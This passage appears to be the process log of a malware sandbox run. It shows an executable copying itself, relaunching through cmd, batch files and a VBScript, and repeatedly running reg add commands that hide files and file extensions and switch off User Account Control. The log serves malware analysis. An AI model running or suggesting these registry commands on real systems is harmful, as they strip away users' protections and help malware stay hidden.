PID 1632 wrote to memory of 1400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1632 wrote to memory of 1400 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1876 wrote to memory of 1524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1876 wrote to memory of 1524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1876 wrote to memory of 1524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1876 wrote to memory of 1524 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1400 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1400 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1400 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1400 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1964 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1964 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1964 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1964 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe
PID 1400 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 988 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\reg.exe
PID 1400 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1400 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1400 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1400 wrote to memory of 1904 N/A C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe C:\Windows\SysWOW64\cmd.exe
PID 1904 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1904 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1904 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1904 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

"C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe"

C:\Users\Admin\hYgwkYwM\QgAscQoI.exe

"C:\Users\Admin\hYgwkYwM\QgAscQoI.exe"

C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe

"C:\ProgramData\DmwYMgQc\PKsMQUYQ.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\AUwAQEUk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\JuUQAEgM.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\JWIIMswI.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NmMQogAg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\NkMIMssg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\JUggIQEk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\dCsQkskY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\wyQEgkcE.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KcUkIQsw.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\GgcsscgA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ASoMwQUc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\Ekgookws.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\ViwcYAMA.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\BEwwYoEY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\EYgkcMss.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\CCcMQwoc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\KuYMEAEU.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\GQUooQoQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\qcAQUYcs.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\hMQcUsYg.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "104731432-496247423-127209854-175099898611656931707743541461038828797-1213834784"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\XGcQkAgQ.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\vQEoQcIY.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\dcksMcMc.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\jgIUUIsk.bat" "C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\v4vcmk"

C:\Users\Admin\AppData\Local\Temp\v4vcmk.exe

C:\Users\Admin\AppData\Local\Temp\v4vcmk

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

